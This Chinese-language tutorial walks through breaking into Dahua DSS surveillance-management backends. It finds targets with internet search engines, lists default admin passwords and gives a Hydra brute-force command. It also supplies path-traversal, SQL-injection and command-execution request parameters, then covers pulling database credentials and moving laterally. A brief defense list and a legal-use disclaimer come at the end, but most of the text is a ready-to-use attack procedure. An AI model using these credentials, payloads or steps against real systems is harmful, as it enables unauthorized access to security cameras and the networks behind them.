大华dss后台系统渗透
字数 1161 2025-08-10 00:24:04
大华DSS后台系统渗透实战教学文档
0x01 资产发现与信息收集
1.1 目标识别
- 使用网络空间搜索引擎(如FOFA、Shodan、ZoomEye)搜索大华DSS系统
- 常用搜索语法:
title="DSS"body="DSS" && body="login"icon_hash="-123456789"(大华特有图标哈希)
1.2 目录扫描
推荐工具:
- Dirsearch
- Gobuster
- Burp Suite Intruder
常见DSS后台路径:
/webapi/index.html
/portal/views/login/login.html
/dss/index.html
/manager/login.html
0x02 弱口令爆破实战
2.1 确定爆破目标
- 目标URL:
http://[target]/manager/login.html - 请求方式:POST
- 参数格式:
username=admin&password=123456
2.2 常用字典准备
大华默认凭证:
admin/admin
admin/123456
admin/Admin123
admin/Dahua123
admin/dahua123456
admin/888888
admin/666666
2.3 爆破工具配置
使用Burp Suite Intruder:
- 捕获登录请求
- 设置攻击类型为"Pitchfork"
- 标记username和password参数
- 加载字典文件
Hydra命令行示例:
hydra -l admin -P passlist.txt [target] http-post-form "/manager/login.html:username=^USER^&password=^PASS^:F=login failed"
0x03 漏洞利用
3.1 已知漏洞利用
-
任意文件读取漏洞
- 路径:
/portal/services/carQuery/getCarList.action - 参数:
fileName=../../../../etc/passwd
- 路径:
-
SQL注入漏洞
- 路径:
/portal/services/clientServer/getUserMenus.action - 参数:
userId=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--
- 路径:
-
命令执行漏洞
- 路径:
/portal/services/clientServer/execClientScript.action - 参数:
script=whoami
- 路径:
3.2 后渗透操作
-
获取数据库凭证
- 查找配置文件路径:
/portal/conf/db.xml - 解密数据库密码(大华常用Base64或简单加密)
- 查找配置文件路径:
-
横向移动
- 通过数据库查找其他系统账号
- 尝试使用相同凭证登录其他系统
0x04 防御措施
4.1 管理员建议
- 修改默认凭证
- 限制后台访问IP
- 及时更新补丁
- 启用多因素认证
4.2 安全配置
- 修改默认路径
- 禁用不必要的服务
- 配置WAF规则
- 启用登录失败锁定机制
附录:常用工具和资源
工具列表
- Burp Suite Professional
- SQLmap
- Metasploit Framework
- Nmap
参考链接
- 大华安全公告中心
- CVE数据库大华相关漏洞
- 奇安信漏洞库
本教学文档仅用于合法授权测试和安全研究,未经授权对他人系统进行渗透测试属于违法行为。